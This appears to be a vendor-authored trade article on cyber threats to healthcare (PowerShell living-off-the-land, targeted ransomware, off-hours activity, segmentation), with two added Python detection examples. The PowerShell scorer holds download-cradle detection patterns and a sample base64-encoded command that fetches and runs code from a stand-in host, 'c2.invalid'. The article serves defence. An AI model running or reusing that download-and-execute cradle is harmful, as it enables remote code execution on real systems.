Trends plaguing healthcare cybersecurity
The average healthcare organisation spends $1.4 million recovering from a breach, which impacts hospital revenue and can severely undermine reputation and trust. - By Rajesh Maurya
The need to regularly consult threat data and update defenses is amplified in the healthcare space, where interruptions to networks can be life-threatening. This is especially true as health systems become more reliant on technology and connected devices tied directly to patients and critical patient care. In addition, the average healthcare organisation spends $1.4 million recovering from a breach, which impacts hospital revenue and can severely undermine reputation and trust — two cornerstones of patient experience and retention.
To minimise the risk of successful cyberattacks, security and IT teams must be constantly aware of the new methods designed to infiltrate networks and translate this into new tactics in their security efforts.
Threats to the healthcare space
While security teams need to remain abreast of all major threat trends — even those that seemingly only target other industries — there are a few standouts from the most recent Threat Landscape Report, which examines data collected during Q1 of 2019, that could specifically impact healthcare.
Living off the land
This refers to a style of attack that appeared consistently throughout Q1. Cybercriminals leverage pre-installed tools, such as PowerShell, that come on targeted systems and can be exploited to launch attacks. This approach facilitates evasion, as the malicious code that is injected appears to be part of a sanctioned process, making it harder for security teams to detect and define. PowerShell, which comes installed on Windows machines, is one of the most popular targets for these types of attacks. Cybercriminals use PowerShell to deliver ransomware and other malicious payloads, to encrypt data and move laterally across the network.
This is a tactic that healthcare IT teams must be highly aware of, especially given the number of IoT devices connecting to the network. Health systems are constantly deploying new connected tools as part of patient treatments, many of which were not built with security in mind. To address this, IT teams should conduct regular checks on devices to ensure that pre-installed tools have not been compromised and turned into an entry point into the network.
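As an added illustration of how a defender can spot the PowerShell abuse described above (this is example code written for this page, not Fortinet's or the article's own tooling), the script below scores constructed process-creation events for common living-off-the-land indicators, decoding `-EncodedCommand` payloads so that a download cradle hidden inside base64 is still caught. The host names, indicator weights and alert threshold are assumptions.

```python
import base64
import re

# Indicators a defender commonly looks for in PowerShell command lines.
# Assumption: a simple scored-keyword model, not a vendor rule set.
INDICATORS = {
    "encoded_command": (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    "download_cradle": (re.compile(
        r"\b(IEX|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest)\b", re.I), 3),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "bypass_policy": (re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I), 1),
}

def encode_powershell(command):
    """Build the -EncodedCommand form (UTF-16LE, then base64); used here only
    to construct sample data that round-trips through the decoder."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline):
    """Score one command line; the decoded payload is scanned as well."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    return {"indicators": hits, "decoded": decoded,
            "score": sum(INDICATORS[h][1] for h in hits)}

# Constructed sample events: (timestamp, host, command line). Host names are invented.
SAMPLE_EVENTS = [
    ("2019-03-04T09:12:01", "WS-RAD-07", "powershell.exe -NoProfile -Command Get-Service"),
    ("2019-03-05T03:02:55", "EHR-APP-01",
     "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
    ("2019-03-04T22:47:13", "INFUSION-PUMP-12", "powershell.exe -NoP -W Hidden -EncodedCommand "
     + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage')")),
]

def triage(events, threshold=4):
    """Return (time, host, score, indicators, decoded) for events at or above threshold."""
    alerts = []
    for ts, host, cmd in events:
        r = analyze(cmd)
        if r["score"] >= threshold:
            alerts.append((ts, host, r["score"], r["indicators"], r["decoded"]))
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Only the encoded, hidden-window launch on the infusion pump clears the threshold; the signed backup script with `-ExecutionPolicy Bypass` scores low and would be reviewed rather than alerted on.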
There have been several high-profile ransomware attacks this year, which have demonstrated a high degree of targeting and planning. In fact, in one instance of LockerGoga, the attackers had already done the due diligence to gain privileged credentials that enabled the execution of the malware. With these credentials, they were able to operate with minimal evasion or obfuscation tactics deployed. This indicates that they had already evaluated the network defenses and determined these measures unnecessary.
Anatova was another standout ransomware in Q1, encrypting as many files as possible and ensuring minimal chances of restoration. Overall, it looks as though criminals are moving away from a purely opportunistic model of malware distribution to focus on specifically selected networks.
With this in mind, health systems must strengthen their malware defenses and ensure they have current data backups. Hospitals are known to be targets for ransomware attacks, as they are more willing to pay to reclaim data, most likely due to deficiencies or poor planning in data recovery and continuity processes. Upon payment of the ransom, reclaimed data may be corrupted or missing, leading to a potential impact on patient safety.
Pre- and post-compromise activity
Evaluating the types of websites being leveraged and the phase in the cyber kill chain at which they were accessed provides insight into how cybercriminals structure their attacks, helping with defense efforts. It was interesting to note when pre- and post-compromise activity occurs. Pre-compromise activity is three times more likely to occur during the work week, as there is often unintentional employee involvement. Post-compromise activity, however, occurs fairly consistently across weekdays and weekends, as little to no user interaction is required.
This brings to mind an important point about segmentation. Healthcare is an industry of constant uptime. The emergency department network, for example, must be running at all times, including the weekend, and cannot be halted or slowed due to an attack. However, there are other departments that close. Should a device belonging to that department log on during off time, such unusual behaviour could be an indicator of an attack. Compromised systems operating during irregular business hours to initiate or extend attacks, or to move laterally across the network, could possibly affect high-need networks like the ED. This is why healthcare systems should segment essential networks to add an extra layer of defense while isolating those devices exhibiting anomalous behaviour until their intention can be determined.
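The off-hours logic above can be turned into a simple detection. The following is an added example written for this page (not Fortinet's or the article's own code): each department gets an operating schedule, the always-on emergency department never triggers, and a device from a closed department that is repeatedly active outside its hours is nominated for isolation pending review. Department names, schedules, device names and the two-event threshold are assumptions.

```python
from collections import Counter
from datetime import datetime

# Constructed department schedules. Assumption: hours are local, Mon=0 .. Sun=6.
# The emergency department is always open, so it never produces an off-hours hit.
SCHEDULES = {
    "ED":        {"days": range(0, 7), "open": 0, "close": 24},
    "RADIOLOGY": {"days": range(0, 5), "open": 7, "close": 19},
    "BILLING":   {"days": range(0, 5), "open": 8, "close": 18},
}

def is_off_hours(department, ts):
    """True if a timestamp falls outside the department's operating window."""
    sched = SCHEDULES[department]
    if ts.weekday() not in sched["days"]:
        return True
    return not (sched["open"] <= ts.hour < sched["close"])

def flag_off_hours(events):
    """events: (iso_timestamp, device, department). Returns the anomalous triples."""
    flagged = []
    for iso, device, dept in events:
        if is_off_hours(dept, datetime.fromisoformat(iso)):
            flagged.append((iso, device, dept))
    return flagged

def devices_to_isolate(events, min_hits=2):
    """Devices with repeated off-hours activity, candidates for segment isolation."""
    counts = Counter(device for _, device, _ in flag_off_hours(events))
    return sorted(d for d, n in counts.items() if n >= min_hits)

# Constructed logon events; 2019-03-09 is a Saturday, 2019-03-06/07 are Wed/Thu.
SAMPLE_EVENTS = [
    ("2019-03-09T14:30:00", "ED-MON-03", "ED"),         # weekend, but ED is 24/7
    ("2019-03-09T14:30:00", "BILL-WS-11", "BILLING"),   # billing is closed on Saturday
    ("2019-03-09T14:42:00", "BILL-WS-11", "BILLING"),   # second hit on the same device
    ("2019-03-06T10:15:00", "RAD-WS-02", "RADIOLOGY"),  # normal working hours
    ("2019-03-07T02:05:00", "RAD-WS-02", "RADIOLOGY"),  # 02:05, outside radiology hours
]

if __name__ == "__main__":
    for hit in flag_off_hours(SAMPLE_EVENTS):
        print("off-hours:", hit)
    print("isolate:", devices_to_isolate(SAMPLE_EVENTS))
```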
It’s now clear that cybercriminals share more than source code and sell technology on Dark Web commerce sites. They also share strategies and techniques. When that information is understood and incorporated into a security strategy, pattern and behaviour matching can improve the ability to detect live threats. Attack vectors, like those just discussed, underscore the need for organisations to rethink their strategy to better future-proof and manage cyber risks.
This should start with healthcare organisations taking a layered approach to security across people, processes, and technology:
People – The vast majority of attacks still happen because someone clicks on a malicious link. Employees need to be continually educated on creating strong passwords, how to identify malicious URLs and email sources, and to not open or click on unfamiliar or unexpected email messages, links, or attachments. This should then be augmented with access management policies, including a zero trust policy, and intent-based segmentation so in the event of an incident, an attack is limited to a specific segment of the network.
Processes – Incident response plans need to include regular backups that are stored off-network, regular testing of those backups, and system restoration drills to ensure everyone knows their role so systems can be restored as quickly as possible. IT teams must always know what assets are online, where those assets are, and then be able to prioritise their access to and consumption of resources based on which are most business-critical.
Technology – Security tools need to be chosen based on their ability to be integrated together and cross-automated so they can gather, share, correlate, and consume threat intelligence across the entire distributed network in real time.
Deception technology is another tactic IT teams should make use of. Effective deception strategies make it harder for an adversary to determine which assets are fake and which are real, while tripwires embedded in these false signals increase the ability to detect an intruder. Finally, segmenting corporate networks limits exposure of critical data if there is a breach.
Healthcare systems are common targets for cyberattacks. Staying aware of popular attack vectors and strategies enables IT teams to better secure crucial network functions. Moving forward, health IT teams should keep these Threat Landscape findings in mind and fortify defenses accordingly.
Rajesh Maurya is Regional Vice President, India & SAARC, Fortinet.